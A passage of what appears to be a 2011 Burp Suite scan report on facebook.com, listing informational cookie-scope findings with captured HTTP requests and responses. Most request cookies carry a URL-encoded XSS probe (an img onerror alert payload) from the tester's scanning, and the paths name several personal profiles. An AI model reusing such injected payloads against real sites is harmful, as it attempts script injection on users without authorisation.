Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.36. http://www.facebook.com/directory/people/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/people/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directory/people/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.37. http://www.facebook.com/facebook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/facebook

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /facebook HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.38. http://www.facebook.com/fayse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/fayse

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffayse; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fayse HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.39. http://www.facebook.com/find-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /find-friends HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

10.40. http://www.facebook.com/find-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /find-friends?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpolicy.php; act=1304613654644%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613654661%2C%22act%22%2C1304613654644%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%3Fref%3Dpf%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C361%2C635%2C12%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.188.21
X-Cnection: close
Date: Thu, 05 May 2011 11:43:46 GMT
Content-Length: 101594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.41. http://www.facebook.com/gale.l.schenk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/gale.l.schenk

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fgale.l.schenk; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gale.l.schenk HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.42. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; made_write_conn=1304595678; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; W=1304595678

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.61
X-Cnection: close
Date: Thu, 05 May 2011 11:44:15 GMT
Content-Length: 20118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.43. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

10.44. http://www.facebook.com/home.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/home.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.103.77
Connection: close
Date: Thu, 05 May 2011 11:43:12 GMT
Content-Length: 0

10.45. http://www.facebook.com/izaOllie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/izaOllie

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FizaOllie; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /izaOllie HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.46. http://www.facebook.com/jezzas previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/jezzas

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fjezzas; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jezzas HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.47. http://www.facebook.com/kimberly.christ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/kimberly.christ

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fkimberly.christ; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /kimberly.christ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.48. http://www.facebook.com/ladonna.lokey previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ladonna.lokey

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fladonna.lokey; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ladonna.lokey HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.49. http://www.facebook.com/lakendra.roberts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/lakendra.roberts

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flakendra.roberts; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lakendra.roberts HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.50. http://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/login.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 11:43:56 GMT; path=/; domain=.facebook.com; httponly
next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; act=1304613664644%2F2; next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; next_path=%2Fmobile%2F%3Fsettings

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 11:43:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.37.19.117
X-Cnection: close
Date: Thu, 05 May 2011 11:43:56 GMT
Content-Length: 16254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.51. http://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/login.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_e_vm3q_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
_e_vm3q_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 12:46:07 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php%3Fnext%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D1242845259; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php?next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
